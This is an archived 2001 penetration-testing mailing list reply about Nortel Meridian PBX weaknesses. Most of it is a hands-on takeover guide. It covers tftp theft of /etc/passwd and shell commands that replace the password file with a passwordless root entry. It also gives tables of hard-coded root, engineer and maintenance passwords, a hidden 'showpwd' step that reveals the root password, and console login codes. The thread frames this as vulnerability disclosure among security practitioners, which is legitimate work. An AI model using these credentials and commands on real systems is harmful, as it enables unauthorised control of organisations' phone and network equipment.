Penetration Testing mailing list archives

Re: Nortel Security

From: Mark Rowe <mark () whatnot demon co uk>
Date: Tue, 10 Jul 2001 12:17:08 +0100

In article <01063012540504.01490@sliver>, H D Moore
<hdm () secureaustin com> writes

I came across this while doing a security review 3 years ago. I tried to
contact Nortel several times but never received a response. I guess they
don't think it is important :-o

If the PBX is hooked into the actual network, there are quite a few ways to 
get access to the system.  The easiest method is to tftp the /etc/passwd file 
off the system and crack the hashes.  If you go this route, you will get a 
user account called "service" with a password of "smile" ;)  If you log into 
the system with this account, you will notice that /etc is mode 0777, so 
getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software 
that came with it was called "Meridian Terminal Emulator".  You could manage 
the PBX with this by first logging in with 0000/0000 then giving it the 
manager password of "9999".  I really wish I had more time to write up the 
stuff I find out there... 

-HD


Anyway I think the service account exists on the MAX,CCR and Link
Meridian components. 

Here are some other stuff I came across,

Accounts that give UNIX level access
====================================

Box             Account         Password        Use
MAX,CCR,Link    service         smile           General engineer account
CCR,Link        disttech        4tas            Engineer account
MAX             root            3ep5w2u         Root

Accounts that give application level access 
===========================================

Box             Account         Password        Use
MAX             maint           ntacdmax        Maintenance account
CCR, Link       maint           maint           Maintenance account
CCR             ccrusr          ccrusr          User account
Link            mlusr           mlusr           User account


To gain root access on Link or CCR -

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow
(e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen.  You can
now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access
depending how the switch is set up.  Try password only first as most
will probably be set up like this -

Password only
enter
logi 0000               (customer level)
logi 1111               (a bit higher)
logi 8429               (maintence)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.
 
 

-- 
Mark Rowe
IT Security Consultant

--------------------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:

https://alerts.securityfocus.com/

Current thread:

Re: Nortel Security Jason Ellison (Jul 01)
- <Possible follow-ups>
- RE: Nortel Security Mike . Ruscher (Jul 01)
- Re: Nortel Security H D Moore (Jul 01)
  - Re: Nortel Security Mark Rowe (Jul 10)
- Re: Nortel Security h0pper (Jul 02)